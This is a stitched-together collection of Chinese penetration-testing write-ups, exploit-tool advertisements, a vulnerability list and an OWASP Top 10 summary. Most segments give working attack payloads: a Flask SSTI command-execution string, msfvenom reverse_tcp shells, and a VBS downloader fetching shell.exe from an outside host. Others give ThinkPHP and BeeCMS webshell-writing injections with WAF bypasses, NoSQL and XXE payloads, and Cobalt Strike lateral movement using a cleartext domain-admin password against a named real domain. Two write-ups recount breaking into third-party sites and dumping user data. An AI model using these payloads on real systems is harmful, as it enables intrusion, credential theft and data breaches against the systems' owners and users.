PART.01 登入过程 1. 访问靶场地址http://101.43.22.226/?name=2023，框架为Flask。 2. 测试存在ssti注入。 3. 直接执行以下命令。 http://101.43.22.226/?name={% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{b['eval'('__import__("os").popen("whoami").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %} 4. 测试目标可以出网，直接执行命令反弹shell和上线msf。 5. 对当前机器进行信息搜集，存在双网卡172.25.1.3和10.10.10.100。 6. 添加路由。 7.对10.10.10.0段存活主机进行扫描， 8. 存活主机有10.10.10.101、10.10.10.102、10.10.10.200 和10.10.10.201。其中，200，201这两台机器开放了445端口，在此探测是否存在永恒之蓝漏洞。 9. 对200这台机器进行漏洞利用。由于不确定200这台机器是否出网，所以payload要设置成正向shell，最后成功获取到这台机器的权限。 10. 因为10.10.10.100这台机器是可以出网的，将它作为我们的跳板机。远程下载frp，搭建socks5代理。 11. 对10.10.10.101进行端口扫描，开放22和80端口，访问80的web服务。 12. 测试存在文件，文件包含漏洞(不存在远程文件包含)。 13. 经过fuzz读取到配置文件config.php，从中获取到数据库的账户密码。 14. base64解码后的数据库用户名为catcat，密码为wannatobeacat。但是由于数据库还是不能连接，因此想到了密码复用——使用ssh，登录上catcat的账户。 15. 当前用户权限较低，尝试提权。使用pspy扫描后发现，root用户每分钟会执行一次backup.sh，且当前用户catcat可以修改此文件。 16. 在backup.sh文件中添加 chmod 4475 /bin/bash，执行bash -p后成功提权。 17. 对10.10.10.102机器进行扫描，发现开放了22和5000端口。访问5000后发现，其是web服务。 18. 存在用户名枚举，但是未爆破出密码，sql注入也不存在。 19. 这里发现用的框架为Express。通常情况下，用的是mongdb数据库，尝试nosql注入。参考链接如下： https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#exploits 20. 修改payload。 注意：需改动未Content-Type: application/json。 {"user": {"$ne": null}, "password": {"$ne": null}} 21.成功进入后台。 PART.02 渗透过程 1. 新建文章。 2. 提交后服务报错，从报错信息中获取到了网站的物理路径。 3. 存在上传功能点测试，返回非法的XML格式，并且发现数据库的请求头也是/articles/xml。查看是否存在xxe漏洞。 4. 尝试读取/etc/passwd文件，成功读取后确定存在xxe漏洞。 5. 就刚才获取到的网站物理路径，读取配置文件server.js的内容。 6. 执行命令反弹shell到主机10.10.10.100。 7. 发现当前用户可以凭借root权限执行/bin/check文件。 8. 查看/bin/check文件，引用os.py。 9. 此处直接修改os.py文件内容，以sudo的权限执行check文件即可提权（由于此处获取交互式shell就会系统停顿，所以没有继续提权）。 10. 主机10.10.10.201开放了比较多的端口，首先访问80端口，但其web服务需要进行验证，利用弱口令admin，admin成功进入后台。 11. 存在文件上传功能点，但是无论上传任何格式都能够成功返回，只是无法找到上传的路径。 12.此处提示样本会上传到文件共享服务器，测试团队将手动审查上传的内容，构造SCF文件以索取ntlm hash，并将文件上传到目标服务器。 13. 在跳板机上安装Respondr，并对其进行监听。 14. 成功抓取到NTLMv2 Hash。 15. 使用hashcat破解。 hashcat -m 5600 hash.txt rockyou.txt 16. 破解出密码为tobyallison31。此外，目标机器开放了5985端口，使用evil-winrm进行连接。 17. 生成正向木马bind.exe，上传到该目标机器后获取到meterpreter。 18. 查看powershell的历史记录，发现他下载并开启了Goservice服务，我们可以替换文件来进行提权。 19. 暂时停止服务。 20. 将bind.exe上传到目录，并重命名为service.exe。 21. 重新启动GoService服务。 22. 成功返回一个meterpreter且权限为system权限。 ...

0x01 发现漏洞 七月正值暑假，闲暇时光在百度上inurl一番，找到了一个古老的企业OA系统 IP站点，没有域名，扫过一眼，.NET流行时代的普遍漏洞浮现在脑海里——SQL注入 在用户名里输入admin’，不负期望地报了错 很明显，前后端都没有对用户的输入进行过滤，直接将’带入了SQL语句进行。初步判断，此OA系统存在SQL注入漏洞。 0x02 漏洞验证 打开BurpSuite，设置好浏览器代理，抓下HTTP请求，一气呵成。 问题参数为 txtLogin=admin%27，可将整个请求复制到 test.txt，使用sqlmap -r 来注入   sqlmap -u http://x.x.x.x/xx.aspx --forms 至此，可以确认存在error-based、stack quires和time-based三个类型的漏洞 0x03 判断数据库用户的权限 发现SQL注入后，首先要判断权限，高权限的注入可以为后续渗透省下很大功夫   sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba 非常nice，再次不负期望地返回了DBA权限，输入以下命令，获得一个shell   sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell NT/SYSTEM权限，时隔两个多月，复现有误，不予贴图 0x04 反弹shell 深入内网 生成一个shell   msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe   由于环境艰难，不能直接上传文件，我选择了用vbs脚本来下载木马到服务器   代码如下： Set post=CreateObject("Msxml2.XMLHTTP")post.Open "GET","http://x.x.x.x/shell.exe"'发送请求post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()'等待3秒，等文件下载wscript.sleep 3000 aGet.Write(post.responseBody)'写数据aGet.SaveToFile "shell.exe",2 用echo命令缓慢地写完了vbs脚本之后，顺利运行，下载了木马 更改名字，移动到IE安装目录进行伪装 start iee.exe 运行木马，metasploit成功收到了SYSTEM权限的shell   该主机拥有内网IP，存在内网，可以互通，并且该主机作为中央数据库 网主机皆为VMware虚拟机 0x05 结束测试，提交漏洞 本次渗透测试成功拿到最高权限， 到此为止，不再深入。随着攻击与防御技术的彼此攀升，程序员的安全意识逐渐提高，SQL也越来越少。 但不少粗糙的程序和古老的系统仍然存在此漏洞，此类漏洞解决方法简单，只用对用户输入参数稍加处理即可.  ...

目录 0x00前言 0x01外网打点 0x02上线CS 域信息收集 抓取hash 提权 0x03横向移动 IPC$横向 使用条件 SMB Beacon 使用条件 建立SMB Beacon监听 psexec_psh横向 域管上线 横向域控 0x04 总结 记一次平平无奇有手就行的幸运域控 0x00 前言 最近在学习内网渗透，很想找个机会练练手。正好团队接到红队评估的项目，于是便有了此文，没什么技术含量，师傅们轻点喷。 0x01外网打点 在外网打点的的时候，都是些小打小闹，没有拿到权限，很是苦恼，最后突然发现了这个站点，一下子坐了起来，直觉告诉我有戏 Ps: 这里自己总结了一些Weblogic常见漏洞 Weblogic12存在 Wls9-async漏洞和 XMLDecoder漏洞，这里直接利用漏洞利用工具验证，漏洞存在。 先简单看一下当前用户权限，当前为administrator权限 直接传个冰蝎上去看看 冰蝎连上去，内网信息收集一波 系统：Windows Server 2008 R2 Enterprise 域：berca.co.id 当前主机是一台Windows Server 2008的机子，那我们就可以抓到明文密码，并且存在域环境。 IPv4 Address. . . . . . . . . . . : 192.168.10.22     Primary Dns Suffix  . . . . . . . : berca.co.id   DNS Suffix Search List. . . . . . : berca.co.id   DNS Servers . . . . . . . . . . . : 192.168.15.187                          192.168.15.180        收集到这里，通过DNS服务器初步判断，192.168.15.180、192.168.15.187这两台就是域控机器，后面也证实这两台就是域控机器。 再看一下进程列表，看一下是否存在杀软，就很棒，居然没有杀软 查看域用户失败，提示权限不足 net user /domain   //查看域用户 默认共享开启 net share  //查看默认共享 0x02上线CS 后续想继续收集一些域信息，但是因为权限不足，所以干脆一不做二不休直接祭出内网大杀器CS，直接powershell一句话上线CS 域信息收集 内网存活主机扫描一波： net view /domain   //查询域 net view /domain:ROOT  //查询ROOT域内所有机器 net group "domain computers" /domain  //查询所有域成员计算机列表 大概看了下，有好几百台机子，还不错。 net time /domain  //查询主域 域服务器通常也会作为时间服务器，主域：\ADBHPSRV.berca.co.id net group "Domain Controllers" /domain  //查看域控列表 Nslookup -type=SRV _ldap._tcp  //查看域控主机名 得到两台域控的地址和主机名： 192.168.15.187 adbhpsrv.berca.co.id     192.168.15.180 adbhpsrv02.berca.co.id   net group "domain admins" /domain  //查询域管 域管还挺多，我们只要能拿到一个域管的权限，就可以在这个域内漫游了 net accounts /domain  //获取域密码信息 nltest /domain_trusts  获取域信任信息 抓取hash 在内网渗透中，很多横向移动的方法都需要先获取用户的密码或者Hash值才能进行，比如哈希传递攻击、票据传递等等。 因为目标机是windows server 2008，所以直接抓到了明文密码： 得到明文密码：Administrator/Psft24680!!@@62## 提权 因为当前是一个Administrator权限，当前主机补丁打得也比较少，所以这里尝试利用甜土豆提权到system，提权成功反弹回来一个system权限的会话 0x03横向移动 IPC$横向 IPC$ 是共享“命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计算机的共享资源时使用。利用IPC$可以与目标主机建立一个连接，利用这个连接，可以实现远程登陆及对默认共享的访问、访问目标机器的文件，上传、下载，也可以在目标机器上运行命令等。 使用条件 • 管理员开启了默认共享 默认共享是为了方便管理员远程管理而默认开启的共享，我们通过IPC连接可以实现对这些默认共享的访问。可以通过net share命令查看，前期信息收集时，就已经查看过当前主机是开启了默认共享的。 • 139、445端口开启 IPC连接需要139或445端口来支持，我们可以通过139和445端口来实现对共享文件/打印机的访问，IPC$连接默认会走445端口，不通的话会走139端口，这两个端口都可以单独实现文件共享。 当前主机满足上述IPC的利用条件，所以先尝试做IPC连接，发现10.23可以连接成功 shell net use \\192.168.10.23\ipc$ "Psft24680!!@@62##" /user:"Administrator" 然后在本机传个马，copy过去 shell copy C:\Windows\Temp\ma.exe \\192.168.10.23\c$\Windows\Temp\ma.exe 之后利用wmic远程执行 shell wmic /node:192.168.10.23 /user:Administrator /password:Psft24680!!@@62## process call create "cmd.exe /c C:\Windows\Temp\ma.exe" 但是在我传过去之后机器久久未上线，远程获取进程发现也并无杀软，猜测目标机器不出网。 SMB Beacon SMB Beacon使用命名管道与父级Beacon进行通讯，当两个Beacons链接后，子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，常用来绕防火墙有奇效。 使用条件 • 具有SMB Beacon的主机必须接受端口445上的连接 • 只能链接由同一Cobalt Strike实例管理的Beacon 在域中，默认域用户是可以登录到除域控以外的所有主机。当我们得到其中一个域用户的账号密码，所以我们可以利用该域用户与其他主机建立IPC连接，然后让其他主机进行SMB Beacon上线，于是批量扫了下445开放的主机 这里扫到了10.23机器开放，前面IPC也是利用的它，这里试试用SMB Beacon让其上线。 建立SMB Beacon监听 首先创建一个SMB Beacon的监听 psexec_psh横向 建立好SMB Beacon监听，尝试进行横向，利用明文密码或者hash让机器上线SMB Beacon，这里利用的是psexec_psh 利用SMB Beacon成功上线后，后面就会有 ∞∞ 这个字符，这就是派生的SMB Beacon，之后再在这台机子抓hash 然后重复操作10.18、10.19 在横向18、19的时候发现了一个疑似域用户的，可以重复上面的IPC连接传马远程执行，或者用这个机子继续去smb横向 当我成功横向24的时候发现了一个域管用户sp_farm，并成功抓取到了明文密码 域管上线 1. 当抓到域管明文，可以直接利用CS的功能，切换用户上线 2. 如果没域管明文，可以查看当前机子是否有域管进程，注入域管进程上线 通过上述两种方式，都可以得到域管权限的回话 横向域控 有了域管权限，就可以直接横向域控了，前期的信息收集我们知道域控都在15段，我们当前所有拿到的机子都是10段的，所以这里利用了CS的另一个功能，我们可以自己添加目标机器，这里直接把域控的IP和主机名都添加上，操作系统写ukonw就可以了 添加好域管主机后，扫描了一下域控机器是否开放了445端口 发现都开放了445，之后就可以用域管权限的会话，或者域管权限的账户横向过去 横向成功，域控主机成功上线 然后导出域内hash，全部拿下 0x04 总结 内网渗透的思路、方法远远不止于此，本项目中用到的也只是很小的一部分，如果文中有错误，望大佬们斧正。   ...

免责声明 请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。   0x01 工具介绍 增加CNVD-2023-00895 包括：泛微、蓝凌、用友、万户、致远、通达等多个高位漏洞。                                                                         e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)e-cology BshServlet-RCE (可直接执行系统命令)e-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)e-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)e-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)e-mobile_6.6 messageType.do-SQlli (sqlmap利用，暂无直接shell的exp)landray_datajson-RCE (可直接执行系统命令)landray_treexmlTmpl-RCE (可直接执行系统命令)landray_sysSearchMain-RCE (多个payload，写入哥斯拉 3.03 密码 yes)yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)yongyou_GRP_UploadFileData-RCE(默认写入冰蝎4.0.3aes)yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)wanhuoa_OfficeServer-RCE(默认写入冰蝎4.0.3aes)wanhuoa_OfficeServer-RCE(默认写入哥斯拉4.0.1 jsp aes 默认密码密钥)wanhuoa_DocumentEdit-SQlli(mssql数据库 可 os-shell)wanhuoa_OfficeServerservlet-RCE(默认写入冰蝎4.0.3aes)wanhuoa_fileUploadController-RCE(默认写入冰蝎4.0.3aes)seeyonoa_main_log4j2-RCE (仅支持检测，自行开启ladp服务利用)seeyonoa_wpsAssistServlet-RCE(默认写入冰蝎4.0.3aes)seeyonoa_htmlofficeservlet-RCE(默认写入冰蝎4.0.3aes)seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)tongdaoa_getdata-RCE (直接执行系统命令)tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)中间件:IIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)安全设备:综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)网御星云账号密码泄露   0x02 安装与使用   1、文件上传指令生成 2、Tasklist敏感进程检测 /3、33、反弹shell命令生成 0x03 项目链接下载 请加入交流群下载...

斗象DayBreak自动化渗透测试工具 核心特性: 1.实战化: 依托漏洞盒子10W+白帽多年沉淀下来的攻防经验，从实战出发，以专业视角将经验转化为产品能力 2.轻量化: 通过非常轻量级地方式安装软探针，即用即走可无限拓展，保障有效性的同时更加方便快捷 3.自动化: 内置多个扫描引擎，周期化、自动化、可持续性地执行任务，实现全场景、全时段、模拟攻击评估 4.社区化: 鼓励企业安全部门像“黑客”一样思考和行动，打造开放包容，人人都是“开发者”的社区精神 支持多平台（win, linux, macos） 下载 DayBreak: 前往https://daybreak.tophant.com/ 进行下载 首次打开会进入激活页面，需要前往 https://daybreak.tophant.com/ 填写QQ邮箱申请 ...

=================================== 免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。 0x01 工具介绍 泛微云桥e-Bridge存在SQL注入漏洞 2022/7/11 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11894 Apache Commons远程代码执行漏洞（CVE-2022-33980） 2022/7/7 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-10567 GitLab远程代码执行漏洞（CVE-2022-2185） 2022/7/1 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-10296 泛微OA存在SQL注入漏洞（CNVD-2022-43843） 2022/6/30 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-43843 通达OA存在代码执行漏洞 2020/8/20 历史真实漏洞 https://mp.weixin.qq.com/s/II1s-xwn4lD5_couvadI9g 用友U8-OA企业版存在SQL注入漏洞（CNVD-2022-31182） 2022/4/30 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-31182 泛微OA存在命令执行漏洞（CNVD-2022-06870） 2022/2/13 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-06870 FastJson代码执行漏洞 无已知公开的与情报对应的新近漏洞 致远A8 getshell 2019/6/26 历史真实漏洞 https://cn-sec.com/archives/1101195.html 禅道存在SQL注入漏洞（CNVD-2022-42853） 新近真实漏洞 FastJson代码执行漏洞 (CVE-2022-25845) 2022/5/23 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-7654 万户OA getshell 历史真实漏洞 http://cn-sec.com/archives/75986.html 蓝凌OA远程代码执行漏洞 2021/4/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-13023 拓尔思mas5 getshell 2022/4/28 新近真实漏洞 https://www.little2pig.work/archives/trs-mas http://cn-sec.com/archives/960259.html thinkphp远程代码执行漏洞 2018/12/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11895 jboss EAP /AS 6.远程代码执行 2019/12/11 历史真实漏洞 https://packetstormsecurity.com/files/167730/JBOSS-EAP-AS-6.x-Remote-Code-Execution.html https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf thinkphp任意文件读取 2018/12/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11895 明御Web应用防火墙任意登录 2022/7/24 历史真实漏洞，安恒已辟谣存在新近漏洞 http://cn-sec.com/archives/1196646.html Laravel存在命令执行漏洞（CNVD-2022-44351） 2022/6/7 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-8513 安恒web应用防火墙远程命令执行漏洞 2022/7/24 历史真实漏洞，安恒已辟谣存在新近漏洞 https://mp.weixin.qq.com/s/VdCjgxDL9qoAWIax5G3e0g http://cn-sec.com/archives/1196646.html 某软sdp软件定义边界系统命令执行漏洞 无已知公开的与情报对应的新近漏洞 某软网络准入控制系统反序列化漏洞 无已知公开的与情报对应的新近漏洞 某某服VPN存在远程缓冲区溢出漏洞（非web端口） 无已知公开的与情报对应的新近漏洞，深信服已辟谣，历史相关的漏洞见相关链接 https://security.sangfor.com.cn/index.php?m=&c=page&a=view&id=19 https://security.sangfor.com.cn/index.php?m=&c=page&a=view&id=18 某盟NF防火墙版本<6.0.3.198存在远程命令执行漏洞 无已知公开的与情报对应的新近漏洞 qax天擎版本<6.7.0.4910存在安全漏洞 无已知公开的与情报对应的新近漏洞 通达 OA 后台 SQL 注入漏洞 2022/7/25 新近真实漏洞 https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ 通达 OA 后台文件上传漏洞 2022/7/25 新近真实漏洞 https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ 华天动力OA前台任意文件上传漏洞 2022/7/25 存在性未确认，且大概率不影响最新版本 启明星辰天玥网络安全审计系统SQL注入0day 2021/7/15 历史真实漏洞 https://woj.app/7183.html uniview监控设备oday 2018/2/7 历史真实漏洞 https://vulners.com/zdt/1337DAY-ID-29739 蓝凌OA授权RCE和未授权RCE 2022/7/12 新近真实漏洞 https://mp.weixin.qq.com/s/zV4h5d9DrI7Nm49suSzIWw PHP 8.1.0-dev RCE 2021/5/23 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-27111 泛微Office 10 SQL注入漏洞 2021/8/13 历史真实漏洞 https://www.buaq.net/go-86552.html org.webjars:dojo 包 <1.17.2 多个漏洞 2021/7/31 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-3594 锐捷网络设备多个存在逻辑漏洞，可绕过身份验证登录多个系统 2022/6/21 新近真实漏洞 疑似用友NC 0day 2021/11/15 历史真实漏洞 https://www.cnsrc.org.cn/hw/1911.html https://decoded.avast.io/janneduchal/analysis-of-attack-against-national-games-of-china-systems/ Coremail Air邮件客户端附件后缀名显示不正确 2022/7/26 新近真实漏洞，厂商已确认 https://community.icoremail.net/article/460?bsh_bid=5789296111 泛微 V9 文件上传漏洞 2022/7/26 存在性未确认 小鱼易连疑似0day 2022/7/26 存在性未确认 泛微 E-office 文件包含漏洞(CNVD-2022-43247) 2022/6/8 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11900 泛微 E-office SQL 注入漏洞(CNVD-2022-43246) 2022/6/8 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11899 禅道 v16.5 SQL注入漏洞 2022/7/25 新近真实漏洞 https://github.com/z92g/ZentaoSqli 0x02 项目链接下载 添加下方QQ群...

看了个私服站，网上搜下漏洞，还真有day，但是没有写getshell方法，我复现看看吧 后台地址：http://url/admin 一个通用的万能账号弱口令： 账号是 lu123 密码 cui123 利用day成功进入后台 传个图片马，然后有个数据库，直接备份数据库，getshell到手 ...

挖洞的时候遇到一个平台 爆破进入后台 下一步肯定是找上传点然后拿shell是吧 确定上传 java站，改成jsp后缀试试 好，可以发现并不是filename控制文件后缀 那估计是str控制了 访问 http:/XXX.XXX/wb/upload/7D4B487AFAC49B42E472A8AB1D60D702.jsp 直接下载。。(一般遇到这种情况就放弃了) 再观察一下请求包 是不是能控制文件名 果然可以，能控制文件名是不是就可以跨目录了 http://xxx.xxx/wb/upload/../../test.jsp 等于http://xxx.xxx/test.jsp 尝试连接 直接administrator权限 ...

网站是这样的，他是利用短视频发布免费皮肤领取的视频，扫码进入这个网页，然后扫码进群再进行诈骗。 报错判断为think PHP框架 试试RCE POST: http://xxxx.xxxx.com/?s=index/index/ s=-1&_method=__construct&method=get&filter[]=phpinfo 为php5，尝试写shell POST http://xxx.xxx.com/?s=index/index s=file_put_contents('1.php','<?php eval($_POST[x])?>')&_method=__construct&method=POST&filter[]=assert 宝塔waf 经过多次实验，宝塔应该是拦截了_POST[关键字，下面我们尝试绕过 在php里面我们可以使用'.'拼接符来连接前后的语句 <?php ev'.'al($_PO'.'ST[x])?>相当于<?php eval($_POST[x])?> POST: http://xxx.xxx.com/?s=index/index s=file_put_contents('1.php','<?php ev'.'al($_PO'.'ST[x])?>')&_method=__construct&method=POST&filter[]=assert 写shell成功 访问http://xxx.xx/1.php 菜刀连接成功 宝塔限制的太死了，提权不了 ...

在某聊天软件学习技术看到有人卖色情站源码，自称苹果CMS三开，呢我肯定要看看，为后续打击违规站点做功课 现来看看代理后台 后台无可利用点，TP框架试着用TP工具扫了一下并无发现漏洞 这个代理后台渗透无望，尝试信息收集，在找了8页后找到了个激活码页面，应该是给下线激活域名的 看到这个查询框，果断burp，仍sqlmap跑一下 运气比较好，存在sql注入漏洞 那么现在就比较简单了，典型的苹果cms表前缀 那么问题来了，如何找到他后台，后台输入admin.php，admin 均为页面不存在 那只好利用我的社工手段了(忽悠大法) ok，后台地址到手，利用SQL注入跑出密码，成功登录后台 后台是苹果10cms，网上看了getshell方法，模板什么的，均无果。 总结: 注册用户信息6千多 代理273个 包括代理登录日志，管理日志已经全脱出来了。 奉劝各位，请勿跨越法律红线。...

bypass任意文件上传系列会总结最常见的绕过思路和方法 1.首先上传点，我们得判断他是不是黑白名单，是否存在waf（检测机制） 可以看到这里有个上传功能，上传简历和图片，这有可能是前端验证，我们先上传个jpg文件 然后抓包 这里的话我们就要判断是不是黑白名单还是任意文件上传，这个时候我们只要吧jpg后缀改成jpgx进行判断 如果是白名单想都不要想只能上传指定的后缀。 可以上传，这个时候我们试下脚本文件，比如jsp 我们可以看见上传jsp文件被拦截，仔细一看原来是防火墙拦截 到这里的话就得讲绕过思路了 常见绕waf呢我这里先讲一种，不然后面我就写（编）不下去了 双写filename绕过 原理呢，这个上传只判断Content-Disposition的filename的文件名 filename如果为多个这里waf就会判断最前面的那个是不是waf里面设置好了的黑名单（不代表所有waf） 比如这样 或这样（注意filename="2.jsp";filename="2.jspjsp" 的中间有个；） ...

一、序言 前几天记录某一次无意点开的一个小网站的渗透过程，幸运的是搭建平台是phpstudy，cms是beecms，beecms有通用漏洞，然后去网上找了资料，成功getshell并获取服务器权限。 二、渗透过程 1. 无意点开一个网站，发现网站比较小，且看起来比较老，然后发现logo没有改，于是乎去百度搜索这个cms，发现有通用漏洞 Beecms 通用漏洞 https://www.ohinge.cn/php/beescms_sqli.html 2. 这里运气比较好，没有更改后台地址，还是默认地址/admin/login.php 3. 通过通用漏洞发先后台管理处存在sql注入漏洞，直接输入admin’，然后就会报错，这里用万能密码不能登陆，看来还是得通过上面得通用漏洞来进行注入 4. 可以看到输入payload后，页面返回正常，从而可以判断有sql注入，这里采用双写进行绕过 5. 发现这个注入点后，就有各种各样的注入方式了，通过sql语句写入一句话，sqlmap一把梭，手工注入得到账号密码等等，怎么方便怎么来,这里我把几种方法都写一下，看看那种方法可以 方法一 1.通过post抓包sqlmap一把梭，dump出管理员账号密码，进后台找上传点 2.一把梭，发现并没有，使用脚本也没有绕过 方法二 1.通过burp抓包，写入一句话，payload： admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'# 发现写入失败，前面讲到有防护，这里通过hex编码或者char函数绕过 2.对shell部分进行编码 3.写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x，看到可以写入成功。 ps:这里的写入路径纯属盲猜，运气好，默认目录 4.用蚁剑连接,成功连接，至此getshell完毕，下来就是后渗透阶段，后面会讲 char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串，payload为: admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'# 一样成功写入 1.写入成功后，菜刀可以连接，我们访问写入的文件，惊奇的发现竟然有admin，和一串md5码，大胆猜测可能是后台账号和密码，试一下 2.md5解密，wocao，成功登陆，然后就是后台找上传了 三、后渗透 通过whoami查看权限，发现是admin权限，但是不是最高权限，我们要提到最高权限去 方法一 1.通过msf生成木马提权，payload: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe 2.通过蚁剑上传木马，并执行。执行之前打开msf使用模块 use exploit/multi/handler 设置相应参数，然后开始监听 2.不知道什么问题，用这个没有成功，那么只能通过大马提权了 方法二 1.上传大马，此处应该有狗或者盾之类的，用的免杀，成功上传 2.访问大马 3.这里提权方式很多，就不细说了,有大马之后很多操作都可以引刃而解了，开放端口，添加账号，留后门。。等等 4.创建admin权限账号之后，登陆服务器 四、一些其他的发现 通过扫描目录，还发现有phpmyadmin，可以爆破，这里我试了下竟然是弱口令，都是root，但是连接不上，只能通过phpmyadmin登陆，发现是低版本的phpstudy搭建的，这里就可以另一种思路，利用日志文件写入一句话getshell 五、总结 1.前台sql注入获取用户名密码，进入后台找上传 2.SQL注入语句写入一句话 3.phpmyadmin一句话getshell 4.上传大马提权 至此，渗透结束 文章转载于：https://blog.csdn.net/qq_42111373 ...

2021年的Top 10 里出现了3个新主题、4个命名与范围发生变化的主题，此外还进行了一些合并。 A01 :越权访问（2021-Broken Access Control） 从2017年的第5位上升至第1位。超过94%的app都经历过某种形式的越权访问控制测试。对应到越权访问有34个CWE，比任何其它在app中出现的主题次数都多。  A02：加密失败（2021-Cryptographic Failures ） 较2017年相比上升1位至第2位。以前被称为敏感数据公开（Sensitive Data Exposure），但只是一种基本症状表现，并不是根本原因。最新版OWASP重新聚焦于与密码学相关的缺陷，这些缺陷通常会导致敏感数据公开或系统受损。  A03：注入（2021-Injection） 较2017版相比下滑至第3位。超过94% 的app都针对各种形式的注入进行了测试。对应到注入有33 个CWE，在app中出现的次数位列第二。跨站脚本攻击（XSS）目前属于现版本中注入的一部分。  A04：不安全设计（2021-Insecure Design） 2021年Top 10的新主题，重点关注了与设计缺陷相关的风险。如果我们真的想作为一个行业发展，就需要更多地使用威胁模型分析、安全设计模式和原则以及参考架构。  A05：安全性错误配置（2021-Security Misconfiguration） 较前版的第6位相比上升1位。90% 的app都需要经过某种形式的错误配置测试。随着更多转向高度可配置的软件，也就不奇怪为什么这个主题排名能够上升了。之前的XXE主题现在也属于A05类别。  A06：易受攻击与过时组件（2021-Vulnerable and Outdated Components） 前版名称是“应用已知漏洞组件”（Known Vulnerabilities），在行业调查中位列第2，并有足够的数据通过数据分析进入Top 10排名。该类别从 2017 年的第9位上升，是一个难以测试和评估风险的已知问题。这是唯一没有任何CVE可以对应到已归结CWE的主题，因此以默认的利用和影响权重5.0计入评分标准。  A07：身份验证与认证失败（2021-Identification and Authentication Failures） 以前称为错误认证（Broken Authentication），从第2位下滑至第7位。现在包括与识别失败更多相关的 CWE。有着标准化框架可用性增加的帮助，该主题仍然是前10的一个组成部分。  A08：软件和数据完整性故障（2021-Software and Data Integrity Failures） 2021 年的一个新主题，着眼于在不验证完整性的情况下，做出与软件更新、关键数据和 CI/CD 管道相关的假设。CVE/CVSS 数据中最高加权影响之一可以对应到A08中的10个CWE。2017年的不安全反序列化（Insecure Deserialization） 现属于A08的一部分。  A09：安全日志记录和监控失败（2021- Security Logging and Monitoring Failures） 以前被称为日志记录和监控不足（ Insufficient Logging &Monitoring ）。是从行业调查第3位中添加的，从之前的第10位上升。A09被扩大成为一个能够包含更多故障类型的主题，对于我们进行测试有一定的挑战性，而且在 CVE/CVSS 数据中也没有很好的表现。但是，A09类故障会直接影响到可见（visibility）、事件警报（incident alerting）和取证（forensics）的准确性。  A10：服务器端请求伪造（2021-Server-Side Request Forgery） 